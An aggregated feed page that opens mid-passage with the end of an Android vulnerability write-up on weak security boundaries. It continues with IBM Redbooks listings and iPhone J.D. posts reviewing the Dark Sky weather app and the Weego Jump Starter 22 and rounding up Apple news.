Notably, this attack crosses two weakly-enforced security boundaries: The boundary from blkid_untrusted to vold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote's CAP_SYS_ADMIN capability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn't, a security boundary - but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use - for example, as a development aid while stronger isolation is in development - but they can also have negative effects by obfuscating how important a component is for the security of the overall system.
In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.
Categories: Security

IBM Power System E980: Technical Overview and Introduction

IBM Redbooks Site - Fri, 09/07/2018 - 09:30
Redpaper, published: Fri, 7 Sep 2018

This IBM® Redpaper™ publication provides a broad understanding of a new architecture of the IBM Power System E980 (9080-M95) server that supports IBM AIX®, IBM i, and Linux operating systems (OSes).

Categories: Technology

In the news

iPhone J.D. - Thu, 09/06/2018 - 23:47

Earlier this year, Apple announced a new iPad with support for the new Logitech Crayon, a stylus that is almost as good as the Apple Pencil for half the price.  Although the Crayon was only available for the education market, I said at the time that I hoped it would give rise to many new stylus options with the precision of the Apple Pencil.  The jury is still out on whether additional styluses are coming, but in a baby step towards that future, attorney John Voorhees of MacStories reports that Apple announced this week that the Logitech Crayon will be available for everyone to purchase, even if you are not in the education sector, starting September 12.  Of course, that is also the day next week when Apple has scheduled a big event at its campus to show off the new iPhones and who knows what else. The Crayon announcement makes me think that we may see a new iPad next week, and if Apple wants to show off even more new stylus options next week, I would certainly love that.  And now, the news of note from the past week:

  • The Lit Software blog features Arizona attorney Brian Snyder and explains how he uses his iPad in his law practice.
  • What will the new iPhones being unveiled next week be called?  John Gruber of Daring Fireball has some theories.
  • Earlier this year, I discussed a service called TeenSafe which restricts the ability of your kids to use your iPhone, but does so at great risk because you have to give the service access to your iCloud backup, which is a problem if the site is hacked — and sure enough, TeenSafe was hacked.  Ben Lovejoy of 9to5Mac reports that a similar product called mSpy accidentally exposed millions of passwords, text messages, contacts, call logs, notes and location data, etc. to the Internet.  I remain very suspicious of services like this.  Be careful out there.
  • Cella Lao Rousseau of iMore discusses some of the best watch stands for the Apple Watch.
  • Recently, a 15-year-old student tried to share with her mother a photo of a mock crime scene from a medical biology class.  She tried to do so using AirDrop, when she was on a plane, and instead she shared the photo with 15 other random passengers, as the plane was taking off.  The chaos that ensued resulted in grounding the Hawaiian Airlines flight for 90 minutes.  Michael Potuck of 9to5Mac has more details (including the picture).  Hopefully something like this will never happen to you.
  • I cannot tell you what features the new iPhones will have next week, but one thing that they surely won't have is support for the upcoming 5G standard.  I see iPhone 5G support in 2019 or 2020.  But that's not that far away, so it isn't too early to think about what 5G means.  I discussed the transition to 5G earlier this year.  This week, David Pogue of Yahoo wrote a good overview of what 5G means, and also created a nice video overview.
  • The Sweet Setup recommends photo editing apps for iOS.
  • Phishing attacks are increasingly common, and are especially dangerous for law firms because of the confidential information stored on law firm networks.  Many law firms have had to deal with major hacking attacks over the last few years.  Yesterday, the Apple Support account on Twitter posted a good, short video explaining how to look out for phishing attacks on your Apple devices:

Got a suspicious email or text? Don't click on any links or open any attachments. It could be a phishing scam.

Watch our video below to see more ways to avoid phishing. pic.twitter.com/YjIHCXbqxH

— Apple Support (@AppleSupport) September 6, 2018

Categories: iPhone Web Sites

Review: Dark Sky -- fantastic weather app, now with improved interface

iPhone J.D. - Wed, 09/05/2018 - 01:23

Schools in New Orleans were closed yesterday, and many are still closed today, because for a while it looked like Tropical Storm Gordon was headed this way.  That storm instead headed towards the Mississippi/Alabama border, but it had me using my weather apps even more than normal.  Dark Sky has long been one of the best iOS weather apps because of its incredibly accurate to-the-minute forecasts for the next hour — so much so that many other apps rely on Dark Sky for their own data.  But the app was recently updated to version 6.0 with a new interface, plus it is even faster under the hood.  Especially with these improvements, there is no doubt that Dark Sky is one of the very best weather apps for the iPhone and iPad.

Accurate, minute-by-minute predictions for the next hour

One of the best features of the Dark Sky app is that it tells you whether you need to grab your umbrella as you walk out the door.  Dark Sky can figure out whether it is going to rain during the next hour at your precise location.  When you start the app, if there is rain in the next hour, you will see a graph similar to this one:

If the app tells you it will start raining in 8 minutes, you might as well start opening up your umbrella in 7 minutes.

This information is also useful if it is currently raining and you are trying to decide whether to wait for a gap in the rain, or if you should just go now because it isn't getting better any time soon. 

Great forecasts, with an improved unified interface

Many apps do a nice job of giving you forecasts for the next few hours and the next few days.  Dark Sky has always had accurate data, but thanks to the recent version 6 update, I really like the way that this data is displayed all in one place.

When you start the app, the app gives you a forecast for your specific current location, but you can quickly search for another location (and you can save up to six locations, allowing you to swipe left and right to switch between locations).  Clear icons and numbers tell you the current conditions.

Next, you see a map with rain indicated.  Dark Sky has always used an interesting style for showing radar information on a map; instead of the blocky tiny squares, the colors are smoothed out. 

Next you see the hourly forecast, provided in a fantastic interface thanks to the recent update.  A bar along the left side gives you a visual indication of rain (the color changes to blue).  Next you see the hour, the forecast information, and the temperature in a circle which moves left or right to show relative increases and decreases in temperature.  I love the way that Dark Sky now shows all of this information at once, making it incredibly easy to see when rain will start and stop over the next few hours and how the temperature will increase or decrease over the next 24 hours.

If you scroll down, you will see the forecast for the next week.  Again, the graphics are clean and the information is easy to understand.

If you tap on any day, you get hourly forecasts for that specific day in the same format that the app normally gives you for the next 24 hours.

Maps with radar

If you tap the Map button at the bottom of the app (or if you tap on the radar map at the top of the main screen of the app), you are brought into a map view.  You can zoom in or out to see precipitation, and you can tap a play button at the bottom to see an animation of the last three hours and the predicted next hour.  Again, the nice smooth animations which are unique to Dark Sky make it easy to see what is going on.


Time Machine

I usually use a weather app when I want to look to the future.  But if you need historical weather information for a particular location, Dark Sky can give you that too.


Apple Watch

If you use an Apple Watch, Dark Sky has a nice app which shows you much of the same information for your current location that you see in the iPhone app, except for the maps.



Dark Sky has long been the leader in accurate forecasts on the iPhone and other devices, and thanks to the recent interface update, it is now one of the best apps for presenting this information in a clean interface which quickly tells you what you need to know.  If you ever use an iPhone to pay attention to the weather, this is an app that you should own.

Click here to get Dark Sky ($3.99): 

Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 08/31/2018 - 02:09

Yesterday, Apple announced that it will hold a product announcement event on its campus in Cupertino, California on Wednesday, September 12 at 10 Pacific.  Jason Snell of Six Colors posted a picture of the invitation.  If you don't mind spoiling the surprise of learning all of the details on September 12, Guilherme Rambo and Zac Hall of 9to5Mac seem to have obtained some marketing images from Apple showing off the new iPhone and the new Apple Watch.  John Gruber of Daring Fireball speculates that those images may have been posted to a public Apple server by mistake, leading to the leak.  If that's true, there are some very unhappy people in Cupertino today.  And now, the news of note from the past week:

  • Two factor authentication is a fantastic security method which I think will become even more prevalent in the future.  At my law firm, we use Microsoft Authenticator as a second authentication method for many of our firm's resources, such as remote access.  It works really well; using either an iPhone app — or easier still, a notification on my Apple Watch — I can confirm that yes, it really is me logging in.  This week, Alex Simons, Vice President of Program Management, Microsoft Identity Division, announced that Microsoft is rolling out Microsoft Authenticator as an Apple Watch app.  This means that even if you receive a push notification which requires a PIN or biometric, you can approve access with an Apple Watch.
  • Attorney John Voorhees of MacStories reviews the new version 3.0 of Due, a task manager app.
  • Lisa Vaas of Naked Security reports that a U.S. citizen who is Muslim is suing US Customs and Border Protection for seizing her iPhone in an airport, copying all of the data on it, and keeping the iPhone for 130 days.  (via Ride the Lightning).
  • Zac Hall of 9to5Mac discusses using the HomeKit-compatible Lutron Serena Motorized Shades.
  • Michael Rockwell of The Sweet Setup explains how to use your iPhone and HomeKit devices to turn on the lights in your home whenever you or your spouse come home at night.
  • Jonny Evans of Computerworld has some productivity tips for the iPhone.
  • Kaitlyn Wells of Wirecutter recommends the best bag organizers to store all of your USB-to-Lightning cords, power adapters, and everything else you might want to carry around in a bag.
  • And finally, tomorrow, September 1, Apple is celebrating national parks around the world by giving you the opportunity to earn an award in the Activity app.  The graphic that you can earn was inspired by Redwood National Park's 50th anniversary.  If you do a walk, run, or wheelchair workout of 50 minutes or more, you get to add the below award to your digital collection.  I like these awards because they serve as motivators, even though we all know it is just a simple image.  If you own an Apple Watch, try to find an hour to walk tomorrow!

Categories: iPhone Web Sites

IBM Power Systems LC921 and LC922 Technical Overview and Introduction

IBM Redbooks Site - Wed, 08/29/2018 - 09:30
Draft Redpaper, last updated: Wed, 29 Aug 2018

This IBM® Redpaper™ publication is a comprehensive guide that covers the IBM Power Systems™ LC921 and LC922 (9006-12P and 9006-22P) servers that use the latest IBM POWER9™ processor technology and support Linux operating systems (OS).

Categories: Technology

IBM Storage Networking SAN128B-6 Switch

IBM Redbooks Site - Wed, 08/29/2018 - 09:30
Web Doc, published: Wed, 29 Aug 2018

The IBM Storage Networking SAN128B-6 high-density switch scales easily to support storage growth, demanding workloads, and data center consolidation.

Categories: Technology

IBM Power System E950: Technical Overview and Introduction

IBM Redbooks Site - Tue, 08/28/2018 - 09:30
Redpaper, published: Tue, 28 Aug 2018

This IBM® Redpaper™ Redbooks publication gives a broad understanding of a new architecture of the IBM Power System E950 (9040-MR9) server that supports IBM AIX® and Linux operating systems.

Categories: Technology

Review: Weego Jump Starter 22 -- jump start your car battery and recharge your iPhone battery

iPhone J.D. - Sun, 08/26/2018 - 22:28

Many of us keep handy an external battery that can be used to recharge an iPhone.  However, occasionally you need to charge another mobile device:  a car.  If you ever find yourself with a dead car battery, sometimes it is possible to find a friend with another car and jumping cables, but that is a huge aggravation and may not even be possible depending upon where your car is located.  The simple solution is to keep a portable jump starter in your trunk.  The Weego Jump Starter 22 is an amazing device that makes it incredibly simple to jump start your car, and as an added bonus you can use it to charge an iPhone or iPad.  This device recently saved my bacon, and I enthusiastically recommend that you get this device now so that you have it when you need it.

My story

Virtually all of us have had to deal with a dead car battery at some point.  Here is my recent story.  I own a relatively new car — a 2017 Honda Accord.  (Last year I wrote about how much I love the CarPlay in my new car.)  About two weeks ago, I drove my car to a store, but then when I left the store a few minutes later, my car battery was dead.  Fortunately, my wife was not too far away so she could drive to me so we could jump my car, but I knew that I wouldn't always be so lucky.  It seemed strange that this would happen to a relatively new car.  Did I maybe leave on a light overnight without realizing it?  For a while I had been thinking of buying a portable jump starter, and after this occurrence I decided to play it safe and buy the Weego Jump Starter 22 on Amazon that same day. 

A week later I had to fly to Florida for business for a few days.  When I returned to the New Orleans airport and went to start my car, once again it was dead.  This time, getting a friend to drive to me to jump my car would have been a huge nightmare.  They would have had to drive all the way to the airport, go into a pay parking lot, and even then I'm not sure how it would have worked because there were cars in all of the spots around me so I wouldn't have been able to get another car close enough to the battery in my car.  And to make matters worse, I could see that it was about to start raining in 15 minutes.

But I didn't have to worry about any of this.  I took the Weego Jump Starter 22 out of my trunk, hooked it up, started my car, and then I was on my way.  The whole experience took me less than two minutes and could not have been easier.  What normally would have been a disaster was instead incredibly quick and easy.

A few days later, I brought my car to the dealer, which confirmed that my battery had to be replaced, fortunately at no charge to me because it was under warranty.  Hopefully that is the end of this story, but if for some reason there is some other electrical issue in my car and I encounter a dead battery again, I'm not worried because I have the Weego Jump Starter 22 with me.

How it works

Before I explain how it works, let me emphasize again how simple this thing is to use.  I am about as far as one can be from a car mechanic, and even for me, using this device was a breeze.

For example, the clamps on this thing are better than any other clamps I have ever seen.  Traditional clamps can be hard to fully open, and they open like a crocodile's mouth and can be difficult to attach to a terminal and sometimes slip off.  Weego has a patented innovation the company calls Smarty Clamps.  They open ultra-wide so it is simple to attach them to a terminal, and you don't have to squeeze very hard to get them to open fully.  Last year, Wirecutter rated the Weego Jump Starter 22s the best portable jump starter, in part because the "strong, easy-to-use clamps make a good connection on a variety of battery posts."  (The Weego Jump Starter 22 that I purchased has the same clamps; it is slightly more expensive than the 22s because it adds the ability to charge a cellphone, adds a 250 lumen flashlight, and it is rated IP65 so it is water, dust and dirt resistant.)

The Weego Jump Starter 22 comes in a metal box which looks like a lunch box and holds all of the parts.  It is nice to have something sturdy to hold it all together, and I just put the lunch box in my trunk.  It also comes with a holding bag if you want something even more compact to hold it all together.

The Jump Starter 22 delivers 1700 peak amps and 300 true cranking amps, which Weego says is sufficient for motorcycles, boats and 95% of cars & trucks on the road today — anything with up to a 5L gas or a 2.5L diesel engine.  (Weego also sells a Jump Starter 44 and a Jump Starter 66 which will work with muscle cars and big trucks — the types of cars which might laugh at my Honda Accord.)

The top of the Jump Starter 22 has a protective cover, to keep out water or dust.  To jump start a car, flip open that lid to expose a connector where you plug in the clamps.

Next, turn the Jump Starter 22 on, using the power button located on the bottom right side.

Next, you attach the black clamp to your negative terminal and the red clamp to your positive terminal.  If for some reason you get that mixed up and attach to the wrong terminals, the device will not send power and instead it beeps and lights next to the word "reverse" will flash.  So it is idiot-proof.

Next wait a second or two until you see a green ready light.  That means everything is good to go.  Start your car. 

Finally, you disconnect the clamps from the Jump Starter 22.  Once you do so, a charge is no longer flowing to the clamps, so you can disconnect the clamps from the terminals in whatever order you want.

All of the lights make it super easy to understand what is going on.  Also, four lights on the body of the device tell you how much power you have left.  I had all four lights before I jumped my car, and afterwards I still had all four lights.  It takes about 2.5 hours to fully charge the Weego Jump Starter 22, and Weego says that the device will hold a charge for at least a year, and it has 1,000 charge cycles. 

Unlike traditional jumping cables, you don't need to worry about the two clamps on the Jump Starter 22 touching each other.  The Weego only sends power when it detects that it is connected to a battery.  That, along with the reverse polarity detection, means that you don't need to worry about doing something wrong and creating sparks.

It was easy for me to find a place to put the device when I was charging my car, but if for some reason you don't have a good space, the device comes with a hook and lanyard that you could use to attach the device to the underside of your car hood.  You can also use the hook and lanyard in connection with the built-in flashlight to create a work light that lasts up to 14 hours.

The Jump Starter 22 comes with a USB-to-Micro USB charging cord.  It also comes with a USB car charger that goes into a car's power port / cigarette lighter, so you can charge this device while you are driving and when your battery is strong, and then it will be ready when necessary.

Charge your phone

Carrying a Weego Jump Starter in your car means that you never have to worry about a dead battery again.  But hopefully you won't need to use the device very often to start a car, and since the core of the device is a powerful battery, Weego also lets you use this device to charge your phone.  So if you drive somewhere only to realize that your phone is dead or low on power, just take the Weego Jump Starter 22 from your trunk, add a USB-to-Lightning cable, and you are ready to go.  (Consider storing a USB-to-Lightning cable, such as an inexpensive Anker PowerLine cable, in the Weego lunch box so you have it if you need it.)

If the Weego is at full charge, you have 1700 Amps, which depending upon your iPhone model should give you somewhere from almost a full charge to multiple charges.  Weego advertises "up to 3 full charges" but obviously that depends upon which device you are using.  Weego also says that the Jump Starter 22 detects what kind of device you are using and "automatically provides [the] fastest charge to your phones, tablets & other USB devices," 5V or 9V at 2.4A output.

The Jump Starter 22 (without the clamps) has dimensions of 3.25" x 6.25" x .75" and weighs about 10 ounces.  You can certainly buy smaller external batteries to charge your iPhone, but the Jump Starter 22 is not intended to be the portable charger that you carry around and use every day.  It works great for the rare situation when you are away from the home or office and you need something to charge your iPhone or iPad right away — and then you are glad that the device is in your trunk so you can grab it and walk wherever you are going with something handy to charge your phone.


Having a portable jump starter in your car gives you peace of mind.  Everyone has a car battery die at some point, and with this device in your trunk, you'll never have to worry about being stranded or dealing with inconveniences when it happens to you.  And because of the excellent design of the Weego Jump Starter 22, it is fast and easy to jump start a car.  As an added bonus, you have a battery in your car that you can always use to charge an iPhone or iPad — which gives you even more peace of mind.

If you decide that you don't need an iPhone charger, and if you don't care about the flashlight and the IP65 rating, then get the Weego Jump Starter 22s.  It is cheaper, but the basic design is the same as the Jump Starter 22, including those fantastic clamps and useful status lights that walk you through using the device to jump a car battery.

Whichever model you get, this is a good product to get now, while you are thinking about it, so you have it later when you really need it.  You might need it for yourself, but even if you are helping a friend jump a car, it is going to be much, much easier to use a portable device like this versus getting your own car in the right position so that you can jump your friend's car using your own car.

Click here to get the Weego Jump Starter 22 from Amazon ($94.71)

Click here to get the Weego Jump Starter 22s from Amazon ($62.99)

Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 08/24/2018 - 00:26

Rene Ritchie of iMore explains why he believes that Apple's September product announcement will take place on Wednesday, September 12, just over two weeks from now, and says that we could see a larger version of the iPhone X, perhaps with Apple Pencil support, an iPhone 9 with a design similar to the iPhone X but with an LCD screen, an Apple Watch Series 4 with smaller bezels so that the physical size is the same but the screen is larger, an iPad Pro 3, new Macs, and more.  That's a whole lot of new Apple products that could be just around the corner.  Clear some space on your credit card.  And now, the news of note from the past week:

  • Attorney John Voorhees of MacStories discusses an update to the Dark Sky app which I think greatly improves the interface of that weather app.  For a long time now, CARROT Weather has been my favorite weather app, but with this update, I've started to use Dark Sky even more.
  • Elizabeth Sullivan of PCMag reviews the Logitech Crayon — the $50 version of the Apple Pencil — and names it an Editors' Choice.  The Crayon is currently only being sold to schools, but I hope that will change in the future.  In fact, it would be fantastic to have lots of different stylus choices that all work as well as the Apple Pencil.
  • VPN software is used to keep your Internet use private, especially if you are using public Wi-Fi.  But according to Chance Miller of 9to5Mac, Apple has asked Facebook to remove its Onavo VPN app from the App Store.  While that app may keep your Internet use private from other people on the same network, apparently Facebook tracks everything that you do while using the app, making it a privacy nightmare.  Kudos to Apple for continuing to make privacy a priority.
  • Speaking of privacy, John Gruber of Daring Fireball links to a Digital Content Next story about a report from Vanderbilt Professor Douglas Schmidt which finds that while Google doesn't collect any of your personal data from the Safari web browser when you are not actively using it, a dormant Android phone running the Chrome browser sends information to Google 340 times in a 24-hour period.
  • Gruber also discusses the shake-to-undo feature of the iPhone, and notes that many people don't even know that the feature is there.  I don't use it often, but when I do, I'm glad it is there.  Hopefully, you already know that it is there, but if not, you do now.
  • Zac Hall of 9to5Mac recommends HomeKit devices that you can use to monitor the temperature at your house.
  • Peter Cao of 9to5Mac shows off how 1Password is integrated into the operating system in iOS 12.  Juli Clover of MacRumors also wrote a good explanation with lots of pictures.  This feature looks fantastic.
  • Roger Fingas of AppleInsider reports that, from today through August 31, Apple will donate $1 to the National Park Foundation for every Apple Pay purchase made at an Apple store or on the Apple website.  And on September 1, there will be a special Activity Challenge on the Apple Watch.
  • Steven Musil of CNet reports that you can now use Apple Pay when you shop at Costco.
  • Ian Fuchs of Cult of Mac says that the free Highball app is an essential iOS app.  I agree; it is what I use to store all of my cocktail recipes. 
  • And finally, here is an ad for Face ID on the iPhone X that Apple debuted a few weeks ago which features a game show theme.  It is called Memory:

Categories: iPhone Web Sites
